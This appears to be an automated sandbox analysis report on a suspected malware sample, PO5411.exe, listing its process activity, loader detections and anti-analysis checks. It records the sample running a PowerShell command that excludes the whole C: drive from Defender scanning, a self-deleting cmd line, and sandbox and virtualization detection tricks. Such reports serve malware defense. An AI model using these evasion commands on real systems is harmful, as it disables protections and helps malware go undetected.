                      Source: C:\Windows\SysWOW64\cmd.exeCode function: 21_2_011DC5CA _get_osfhandle,GetConsoleScreenBufferInfo,WriteConsoleW,GetLastError,GetLastError,FormatMessageW,GetConsoleScreenBufferInfo,WriteConsoleW,GetStdHandle,FlushConsoleInputBuffer,GetConsoleMode,SetConsoleMode,_getch,SetConsoleMode,GetConsoleScreenBufferInfo,FillConsoleOutputCharacterW,SetConsoleCursorPosition,EnterCriticalSection,LeaveCriticalSection,exit,21_2_011DC5CA
                      Source: C:\Windows\SysWOW64\cmd.exeCode function: 21_2_011FA0D2 memset,GetDiskFreeSpaceExW,??_V@YAXPAX@Z,21_2_011FA0D2
                      Source: C:\Users\user\Desktop\PO5411.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\PO5411.exe.logJump to behavior
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4500:120:WilError_01
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6644:120:WilError_01
                      Source: C:\Users\user\Desktop\PO5411.exeFile created: C:\Users\user\AppData\Local\Temp\PO5411.exeJump to behavior
                      Source: PO5411.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                      Source: C:\Users\user\Desktop\PO5411.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
                      Source: C:\Users\user\Desktop\PO5411.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: PO5411.exeReversingLabs: Detection: 20%
                      Source: C:\Users\user\Desktop\PO5411.exeFile read: C:\Users\user\Desktop\PO5411.exeJump to behavior
                      Source: unknownProcess created: C:\Users\user\Desktop\PO5411.exe 'C:\Users\user\Desktop\PO5411.exe'
                      Source: C:\Users\user\Desktop\PO5411.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'powershell' Add-MpPreference -ExclusionPath C:\
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\Desktop\PO5411.exeProcess created: C:\Users\user\AppData\Local\Temp\PO5411.exe C:\Users\user\AppData\Local\Temp\PO5411.exe
                      Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\AppData\Local\Temp\PO5411.exe'
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\Desktop\PO5411.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'powershell' Add-MpPreference -ExclusionPath C:\Jump to behavior
                      Source: C:\Users\user\Desktop\PO5411.exeProcess created: C:\Users\user\AppData\Local\Temp\PO5411.exe C:\Users\user\AppData\Local\Temp\PO5411.exeJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\AppData\Local\Temp\PO5411.exe'Jump to behavior
                      Source: C:\Users\user\Desktop\PO5411.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                      Source: PO5411.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                      Source: PO5411.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                      Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000012.00000000.815065469.0000000005A00000.00000002.00000001.sdmp
                      Source: Binary string: wntdll.pdbUGP source: PO5411.exe, 00000011.00000002.850207954.00000000011F0000.00000040.00000001.sdmp, cmd.exe, 00000015.00000003.848880099.0000000003230000.00000004.00000001.sdmp
                      Source: Binary string: cmd.pdbUGP source: PO5411.exe, 00000011.00000002.850001084.0000000001130000.00000040.00000001.sdmp, cmd.exe, 00000015.00000002.913116330.00000000011D0000.00000040.00000001.sdmp
                      Source: Binary string: wntdll.pdb source: PO5411.exe, cmd.exe, 00000015.00000003.848880099.0000000003230000.00000004.00000001.sdmp
                      Source: Binary string: cmd.pdb source: PO5411.exe, 00000011.00000002.850001084.0000000001130000.00000040.00000001.sdmp, cmd.exe
                      Source: Binary string: C:\Development\Releases\Json\Working\Newtonsoft.Json\Working-Signed\Src\Newtonsoft.Json\obj\Release\Net40\Newtonsoft.Json.pdb source: PO5411.exe, 00000001.00000002.787808714.0000000002843000.00000004.00000001.sdmp
                      Source: Binary string: wscui.pdb source: explorer.exe, 00000012.00000000.815065469.0000000005A00000.00000002.00000001.sdmp

                      Data Obfuscation:

                      barindex
                      Yara detected Costura Assembly LoaderShow sources
                      Source: Yara matchFile source: PO5411.exe, type: SAMPLE
                      Source: Yara matchFile source: 00000011.00000002.848830027.00000000007B2000.00000002.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000000.647947082.0000000000492000.00000002.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000015.00000002.912869923.000000000105D000.00000004.00000020.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000002.784541323.00000000027D1000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000015.00000002.914839428.0000000003B07000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000002.779197131.0000000000492000.00000002.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000011.00000000.777631981.00000000007B2000.00000002.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: PO5411.exe PID: 6140, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: PO5411.exe PID: 6788, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: cmd.exe PID: 5960, type: MEMORY
                      Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\PO5411.exe, type: DROPPED
                      Source: Yara matchFile source: 21.2.cmd.exe.105d728.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.0.PO5411.exe.490000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 21.2.cmd.exe.105d728.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 17.0.PO5411.exe.7b0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 21.2.cmd.exe.3b07960.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 21.2.cmd.exe.3b07960.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 17.2.PO5411.exe.7b0000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.PO5411.exe.490000.0.unpack, type: UNPACKEDPE
                      Source: C:\Users\user\Desktop\PO5411.exeCode function: 1_2_027A8313 push edx; iretd 1_2_027A8327
                      Source: C:\Users\user\Desktop\PO5411.exeCode function: 1_2_0738DFB3 push dword ptr [ebx+ebp-75h]; iretd 1_2_0738DFBD
                      Source: C:\Users\user\Desktop\PO5411.exeCode function: 1_2_07381FA9 push 400529F1h; ret 1_2_07381FB5
                      Source: C:\Users\user\Desktop\PO5411.exeCode function: 1_2_0738C7E8 push cs; iretd 1_2_0738C80D
                      Source: C:\Users\user\Desktop\PO5411.exeCode function: 1_2_0738E0AD push FFFFFF8Bh; iretd 1_2_0738E0AF
                      Source: C:\Users\user\AppData\Local\Temp\PO5411.exeCode function: 17_2_0041B3F2 push eax; ret 17_2_0041B3F8
                      Source: C:\Users\user\AppData\Local\Temp\PO5411.exeCode function: 17_2_0041B3FB push eax; ret 17_2_0041B462
                      Source: C:\Users\user\AppData\Local\Temp\PO5411.exeCode function: 17_2_0041B3A5 push eax; ret 17_2_0041B3F8
                      Source: C:\Users\user\AppData\Local\Temp\PO5411.exeCode function: 17_2_0041B45C push eax; ret 17_2_0041B462
                      Source: C:\Users\user\AppData\Local\Temp\PO5411.exeCode function: 17_2_004155FB push edx; ret 17_2_00415611
                      Source: C:\Users\user\AppData\Local\Temp\PO5411.exeCode function: 17_2_0041565A push edx; ret 17_2_00415611
                      Source: C:\Users\user\AppData\Local\Temp\PO5411.exeCode function: 17_2_0126D0D1 push ecx; ret 17_2_0126D0E4
                      Source: C:\Windows\SysWOW64\cmd.exeCode function: 21_2_011E76BD push ecx; ret 21_2_011E76D0
                      Source: C:\Windows\SysWOW64\cmd.exeCode function: 21_2_011E76D1 push ecx; ret 21_2_011E76E4
                      Source: initial sampleStatic PE information: section name: .text entropy: 7.98627368188
                      Source: initial sampleStatic PE information: section name: .text entropy: 7.98627368188
                      Source: C:\Users\user\Desktop\PO5411.exeFile created: C:\Users\user\AppData\Local\Temp\PO5411.exeJump to dropped file
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeRegistry key monitored for changes: HKEY_CURRENT_USER_ClassesJump to behavior
                      Source: C:\Users\user\Desktop\PO5411.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PO5411.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PO5411.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PO5411.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PO5411.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PO5411.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PO5411.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PO5411.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PO5411.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PO5411.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PO5411.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PO5411.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PO5411.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PO5411.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PO5411.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PO5411.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PO5411.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PO5411.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PO5411.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PO5411.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PO5411.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PO5411.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PO5411.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PO5411.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PO5411.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PO5411.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PO5411.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PO5411.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PO5411.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PO5411.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PO5411.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PO5411.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PO5411.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PO5411.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PO5411.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PO5411.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PO5411.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

                      Malware Analysis System Evasion:

                      barindex
                      Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
                      Source: PO5411.exe, 00000001.00000002.787808714.0000000002843000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLLDSELECT * FROM WIN32_COMPUTERSYSTEM
                      Tries to detect virtualization through RDTSC time measurementsShow sources
                      Source: C:\Users\user\AppData\Local\Temp\PO5411.exeRDTSC instruction interceptor: First address: 00000000004085E4 second address: 00000000004085EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\PO5411.exeRDTSC instruction interceptor: First address: 000000000040896E second address: 0000000000408974 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
                      Source: C:\Windows\SysWOW64\cmd.exeRDTSC instruction interceptor: First address: 0000000000D585E4 second address: 0000000000D585EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
                      Source: C:\Windows\SysWOW64\cmd.exeRDTSC instruction interceptor: First address: 0000000000D5896E second address: 0000000000D58974 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\PO5411.exeCode function: 17_2_004088A0 rdtsc 17_2_004088A0
                      Source: C:\Users\user\Desktop\PO5411.exeThread delayed: delay time: 922337203685477Jump to behavior
